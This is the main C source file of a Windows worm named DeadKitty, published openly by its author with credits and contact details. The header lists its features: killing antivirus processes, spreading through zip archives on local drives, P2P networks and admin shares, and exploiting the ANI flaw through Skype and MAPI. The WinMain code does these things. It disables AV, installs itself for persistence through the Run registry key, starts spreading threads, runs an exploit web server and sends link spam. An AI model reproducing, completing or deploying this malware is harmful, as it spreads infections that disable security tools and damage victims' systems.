Win32.DeadKitty by wargame || Project Folder

/********************************************************************************
 *  ___                      _  _   _     _    _                                *
 * (  _`\                   ( )( ) ( ) _ ( )_ ( )_                              *
 * | | ) |   __     _ _    _| || |/'/'(_)| ,_)| ,_) _   _                       *
 * | | | ) /'__`\ /'_` ) /'_` || , <  | || |  | |  ( ) ( )                      *
 * | |_) |(  ___/( (_| |( (_| || |\`\ | || |_ | |_ | (_) |                      *
 * (____/'`\____)`\__,_)`\__,_)(_) (_)(_)`\__)`\__)`\__, |                      *
 *                                               ( )_| |                        *
 *                                               `\___/'                        *
 *  _       _                                                                   *
 * ( )  _  ( )                                                                  *
 * | | ( ) | |   _    _ __   ___ ___                                            *
 * | | | | | | /'_`\ ( '__)/' _ ` _ `\                                          * 
 * | (_/ \_) |( (_) )| |   | ( ) ( ) |                                          *
 * `\___x___/'`\___/'(_)   (_) (_) (_)                                          *
 *                                                                              *
 *                                                                              *
 *  _                _       _               ___                                *
 * ( )              ( )  _  ( )             (  _`\                              *
 * | |_    _   _    | | ( ) | |   _ _  _ __ | ( (_)   _ _   ___ ___     __      *
 * | '_`\ ( ) ( )   | | | | | | /'_` )( '__)| |___  /'_` )/' _ ` _ `\ /'__`\    *
 * | |_) )| (_) |   | (_/ \_) |( (_| || |   | (_, )( (_| || ( ) ( ) |(  ___/    * 
 * (_,__/'`\__, |   `\___x___/'`\__,_)(_)   (____/'`\__,_)(_) (_) (_)`\____)    *
 *        ( )_| |                                                               *
 *        `\___/'                                                               *
 *                                                                              *
 *                                                                              *
 *                                                                              *
 *                                                                              *
 ********************************************************************************/

/********************************************************************************
 * I would like to thank many people: free0n, Necronomikon, SlageHammer, izee,  *
 * Nibble ... very friendly people, and then Darkv0id, _Machiavel, Mike_Hood.   *
 *                                                                              *
 * The main features of this worm:                                              *
 * 1) AV killer                                                                 *
 * 2) Spread over local drives in zip archives                                  *
 * 3) Spread over p2p in zip archives (using a special scanner)                 *
 * 4) Spread over netbios shares in zip archives (C$,ADMIN$ etc...)             *
 * 5) Spread using the ANI handling flaw with Skype & MAPI                      *
 *    (http://www.microsoft.com/technet/security/advisory/935423.mspx)          *
 *                                                                              *
 * You are free to contact me at wargame89@yahoo.it or visiting                 * 
 * http://ihateyou.altervista.org - http://vx.netlux.org/doomriderz             *
 ********************************************************************************/

#include "DeadKitty.h"

/* The entry point of worm */
int __stdcall WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
	
	char StartPath[MAX_PATH];
	HKEY StartKey;
	LOADED_IMAGE DeadKitty_PEImage;
	WSADATA wsa;
	char MsG[256],HostName[256];
	struct hostent *resolve = NULL;
	int NetCnt = 0,GoodIP = 0;
	
	CreateMutex(NULL,FALSE,"DeadKitty_by_[WarGame/doomriderz]");

	if(GetLastError() == ERROR_ALREADY_EXISTS)
	{
		ExitProcess(0);
	}

	/* Get some important stuff */
	GetModuleFileName(NULL,DeadKittyPath,MAX_PATH);
	GetWindowsDirectory(WinDir,MAX_PATH);
	GetSystemDirectory(SysDir,MAX_PATH);
	
	/* Check itself */
	if(MapAndLoad(DeadKittyPath,NULL,&DeadKitty_PEImage,FALSE,TRUE) == FALSE)
	{
		ExitProcess(0);
	}

	/* Check size of image, entry point, number of sections */
	if(DeadKitty_PEImage.SizeOfImage != 0x18000 
		|| DeadKitty_PEImage.FileHeader->OptionalHeader.AddressOfEntryPoint != 0x87f1
		|| DeadKitty_PEImage.FileHeader->FileHeader.NumberOfSections != 0x4)
	{
		sprintf(MsG,"Entry Point: 0x%x,NumSections: 0x%x,SizeOfImage: 0x%x",DeadKitty_PEImage.FileHeader->OptionalHeader.AddressOfEntryPoint,
			DeadKitty_PEImage.FileHeader->FileHeader.NumberOfSections,DeadKitty_PEImage.SizeOfImage);
		MessageBox(NULL,MsG,"Somebody corrupted me!",MB_OK|MB_ICONERROR);
		ExitProcess(0);
	}

	/* unload all stuff */
	UnMapAndLoad(&DeadKitty_PEImage);

	
	/* Kill all hostile processes */
	AVKiller();
	
	/* Put worm at startup */
	sprintf(StartPath,"%s\\DeadKitty.exe",SysDir);
	CopyFile(DeadKittyPath,StartPath,FALSE);

	if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",
		0,KEY_WRITE,&StartKey) == ERROR_SUCCESS)
	{
		RegSetValueEx(StartKey,"DeadKitty",0,REG_SZ,StartPath,strlen(StartPath));
		RegCloseKey(StartKey);
	}
    else
	{
		ExitProcess(0);
	}
	
	if(WSAStartup(MAKEWORD(1,1),&wsa) != 0)
	{
		ExitProcess(0);
	}

	while(!gethostbyname("www.trendmicro.com")) 
	{
		WAIT(10);
	}

	/* We should be connected to the internet ... */
	/* Start spreading threads */
	
	DriveSpread(); /* spread over local drives */
	NetShareSpread(); /* spread over shared resources */

	
	/* get ip of system */
	gethostname(HostName,256);
	
	if((resolve = gethostbyname(HostName)) == NULL)
	{
		ExitProcess(0);
	}

	while(resolve->h_addr_list[NetCnt])
	{
		GlobalIP = inet_ntoa(*(struct in_addr *)resolve->h_addr_list[NetCnt]);

		if(!strstr(GlobalIP,"192.168") && !strstr(GlobalIP,"10.0") 
			&& !strstr(GlobalIP,"127.0"))
		{
			GoodIP = 1;
			break;
		}

		NetCnt++;
	}
	
	/* ---------------- */

	if(GoodIP)
	{
		ANIExploiter(); /* Start our exploiting web server */
		LinkSPAM();
	}

	PayLoad(); /* payload thread */
	P2PScanner(); /* spread over p2p */
}